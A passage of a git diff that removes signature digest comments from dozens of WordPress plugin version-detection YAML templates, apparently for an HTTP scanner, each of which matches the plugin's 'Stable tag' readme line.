490a0046304402203ab8f402c33b2d7c091e9eeef66c27999f5f1a2b94c17ba588024548db0e98e50220543c0c146d6c55ebad32574c624836a3afc38a071d060f69078cbb0dac2d7526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index f6197f892f..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc58d801da4a9f6eb4cbad4b8c9b0f7078d185481875d85490584607ee07fb00022100aeb29ed7f7dc5bc494d5ba2534227c404e9d1a25db72c7dc598a61e013aef8c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index b1e6d334e6..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd442079ef861f3f4c91123421c04aa87a7d755cc47141b08cca480ac1a6f6e402200fe945b7690a8d1740ab458548f5cf0267ebb6ba754a7cd975506fa226c3d53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index dff4f5eb66..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044021f54a87cfb991d98d81399bf4f71d320afcdc302623c2515c1c45da7d3763221022100f58f38f7a8c677affd86faea6b690793a605e5691b6843521372adf76be7d25d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 4046901ab4..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b96738cd20f4b7088dc0ab103579c3cce2e5a211119b3b33b04a52c519cb884d022100e44ee19a0ce9b6c636dac04095638f04ddc3183a8e8d4b91075cfb6ce54aeb10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 1dbebb23e5..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200216c471146a77f5febedcca2fc3f465935d50961a9b1e62124c94c910cef4ed022100b9680630abb6808f23d93ec3edc2d7db8636da01b4395d8d5248e255bb97e2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cce37b7ec7..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200347c2cdd7c0dadb78c272b3f59b343acf1d5a6e0a72f20f45a466bb0235071e022100c97e17134d88deeb06bd9de9a447527b0748c559c3534096a7f9de62060eaedf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 76d8970fff..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204a141a07fb073cd4487a6b00cb261479ed3931c8c59f3a8c701798bf139dc874022045db14acc8f06b43d3a303a1f1eed7f8242264af5c7b2b70ba7e54b0bb74cd5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index d52fe11454..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012310e512e732d10b292d5448db774eafac3d87ce696e806c185a5cd48bf9369022100d30c97ddf7f3bc075ee129bb550f56c6ada5815e8a9c94172900d3c9a0fb8ad4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index edb037e82f..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054c629ea0edfb1229e6128f05da666ae5c60032d4e9a4f71ca318a43b085218102207b2b06aa8831fbef6b5714c3b2d4cca7f0635a1c3524949b7cf9b015a36837fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index cdcd58bb0e..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fbbb1a9213452347221fad3e6008d6163cdaed561b386c819780a9fbcc70c5b022004185a108b729b30fe36f1d25c9673c8f36aaa48f1ffe29e9e6c4fe232b22228:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index db570da002..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048b00dc246813f394a6f321632684f6edc6d080515f73997a21929508359355302210090fc9cfefef99cd999c8e62a94eca764ad1f1541c6b6b0295dd0d40ceaa4a3ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index ae1ec92c8a..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206add12076614140aed213348cf683a0ca50f35dcbed8779f687df5b1660be99c022100da93b0cec1bdc0c6a3dd2718b583bdae63272067561d7000be0575c943639169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a502140ad2..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022045b0bbf52fcbf6440a7a24723839d22a03c2a3dc2975ba54b4553e6bcd2618d4022100ce5faeb99e9ba95be05210924fa5e49a59ffc45c1e317ec80f26a1c487bf0da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index d8966ab440..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aed0c40414fe4699ef6a24e17e5e889a8f3e54ed56620019d59f9c4a8bd3cc89022100f681e41dbdbe8019cb787d1f56eb2569a67615bf4ee3c91b1604f0e1507f7070:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index b134623dd0..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f9b3ae536a37f03ff1186803666ed712fe91aea77b8392069b613eab7bf55c38022100bb1c3c9f33528a4e40fa9df55df5edcec7b07b5504e1c76e7ef9d9ab9286e698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 8f03a14ee4..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220416470f600da627b74f5280c73fdfa1fd71bb3da4b3cb265727c8ef106332c94022100f91459462ac2e998028bd01150b28f243d004f61fb6414c9706be17b890f3d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index c39853553f..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bed268f7863e4912cbaadc18491f0ee1e51d76ac4d9ff6306c880423ba20209022030a7529b7020096f5d373352276fa3998c3a3daa76a29c81184aae1c1cbdba92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 9a6978d99c..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce18af55204065ec4faed8b3fefa3802dabb24ad8c115ffa8dca73c29a1bd20002200d1dfafa1652c95f0937feaa02c510b4deb60add21ae997d4e454f087bfc362b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 190d89e567..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100970d51cb2bdf89bebcf79d5ae373ddd6ad838d4088c8af4229379b255e25ff8d022100c646d678badbc4e23f7e6143e6e93ec027077b15f6b0a86377746f5595ab4882:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 8dbfbd5ef3..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a011febc79211ded5df5f7d17128585c5933cd53cdfc46aa5a682529110961f02200f7eba965ef016f05e7fca945ba4372ef175e80790f924486b7f7ddeeb2c8c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 07b080e914..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022065cb67c24e3d3004c537a174f64c6e1f8fc79b10db2999b1d9eeac3176986bf7022070f9e29239455ed9c6ec47dcd3ab6eb2b83ed14b3a94508aa26abe10c0d88633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 28da0adbb5..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220396f2ac16a43a45262ed1e31f1aa775a43a07847fb2ff4f4f6bb6cb4d01e48980220591d710bc13d48591d038b20b85686a5a88592bd1448c8be8900ef64a4b4981a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 19765d635c..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b4cafd184e4f3dd96fa8665e3c32de16c57030c658156f85eb4f4bc1e884942f022003abc34f00c5e5aef17591b586a4ecd9b72d209b532c93372672d7f5833b6616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 6cd26100cd..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bc5f9deeac0e2569855f9ece30a2297ecf531f9ad867dc19ceedff4c34de13f022100a4cad2197e2cfb96f54d1a4a9191a76033a1ce2418d6e006ff38d6ded59df5d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 77e9a88025..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f74870afb8e0bbb441d3507211e4c86ecd17708b45882e8292f46a8c1493d0b202200ba098e676e579e507c054dc0094c7f57a82074dcec4bc8244552adc9701db07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 8e7c22a953..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b38af88ad08fa7e1f93d757cbb8b5aeeb5177e4c640706846414f1c0d5a1113102206d3595fbb49d4eba94164c6407a0dfd7701c44dc7d774a823447b32676cfd627:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index b2db47c6ee..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100826f619fa41c157bb7de2bbd2d62dfae7c026e9456829ce0c38b8c8a8062884702204f3f2400d5ca43db24355a70e58479725265a02df288a6e38187694e5cf1b135:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index d2f60d3deb..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e2b61c2c0ffb01fa594a846bdb0aea6cc1a0d59a9581466c60346a5d224bc87f022100d3d2ef6c5b03a29b257f1d97a6d35d4b35fa62bfae9972b16e908e2abcfd9af4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 5a84317c4b..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021aa3833cf2697be230162a46e111f2c015c5a73d6c1cf800e80c03c69c7b2040220301fccd0f1efd9a9a8d7f9939ccb329b0e69ef4a1770a0f03fd8f4950e42c956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 748be121ae..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220728f156460ff8b41a210da0df6c440f099c75614bffa71c872f476337fd9c71a0221008ece0b5d384f43444992891830824dcd4579889ffc08ade8d43f5d70f0c79e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 2ce42fb603..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075eb723016c39818c3bd0f6b265561256f5ea9d44d95246192694ffcebcbe71b022100c2084d3171a6696201802ee1c7a9542e72a987e1ae11dd2d62682dd0485ff711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 96aa3150d8..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057fdefbe002ab884f26afb049e03e0773e7542e62085efd8cdf8a4dd70f46e26022100e0ed482faa6957bf31663bf2cb3e9baa2438cccc8e22c73c3f3728971bdae5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index a69679fef1..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022032c227f6255411e84dfd6ab9f362ef347b30df601ba52694cc26f6655a8118c9022100dc515e290a94e30451a144f753a1f59ecd28b9dd81f64c9543651a04ec5dff5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 1916916600..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a4fef103f7dd1ac08a6ad69aa66ea5697d7557bd9e9772be206c4e52a7a35b7022036b6a05c355237392782fdc08cfe2c7486ab3e845eaf4357c658b35bb34af4e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 58f8b6e4e8..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f74a0f6447631353736230c5ddb0a71fa51e8bba63d1598a8182f255d4f6f84b02205d2610507616991551e90c8eaf7e25cb226c91bccb323f5d086fc42787e0b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index b229f7e12e..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205665aa5f9a3ccbd1826b9fe0bc75a601219bcf51e5f57873f7f9cc86b8bf12470220731a267253824897ce254fe59faf4baeba2bf93101720fda434ef74d06c1add7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 62dbdbecdb..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d85248215a53996e263c7278a45508637ead7f2ecd1611dadf41f6a49f513b48022100fa566ebddd0d62bf5fa17a7a3b543bcb56ac60bfa64acc7f20aa77abf14d1243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index d5480908ee..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022017bed65938d42d7399af9de90c71947c8d950ff4d7b7c51a714406c2beadd47d022006b984d8be22c2cfb4774588ed476ef401b579c3d0051a4bd269b6cf1f4d2c03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 6f52ffd7de..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b2e090305e3fa421de85a036c651c8f9d59ae3978dd4d4710aa1a66afc08685c022015e18e8e493332e04e66d43a0a0e2d85ef0355432d8ddf98d9621e63b37b8425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 12c75543ae..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff8b3fa119ca5abb54bec147986b6069612e15ad34245990b9c4b23ddd5b58f40220249686bd20f914827b2faf7b16a1fe954e2b3fafe8e87993886b23868aec488a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 251f10829d..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b795879f0bc00304e0fa78b2b4ea4b719159d06a15cfe703ee2b383834139986022100bd1f05f3ab41310aacd268b065d32311d06f5bda0e867610d9f904f4d268a18b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 774a08f974..bedb85a0eb 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093632ab38b7ad5353d32e9967173b8f39081dbb1f3f75484c84bd0e47e02343c02204a01744e29c44573922c98c72cb180fd83d23d8afb0fe9bfcdbe3f72ef62bbd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index bb3073fce1..45bbbc71df 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022065cfd41e36bbba83160f5ccab1b05b02bf806c48bbd4440948604dcc5339513c0220793692d071822772e93d311908b3d9a6e61513ba23c2c6ff5661e34af5edd1b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index d3eed126e0..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204744588930018506172c8ffd59248850ab478ee2207ee1233ff3a358dd80c3ed022100b0f1a9b1b57dc65b064c36829bb6d122ae6458943358048c664e5117a1bd8261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 072ace5a52..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1c0d0712239b82a59721a43af1a680dca433ffef2528f201fbc4c04dfcda35c022100c5a2d4f5d5b5f0b854c0d1cfefcf842fb2e59117f10bc483d34aec4c801bde8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 06630cf2c6..0db316d66d 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204eff4e4f2fc0219f167bbc43215addde9f6fd99ef285c153034104e3ef8b1b0702206cff0ebab9d8f79f40551549032d0bd5d62c41ec85397d9168e97600644135c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 6e25646bf9..135639253d 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 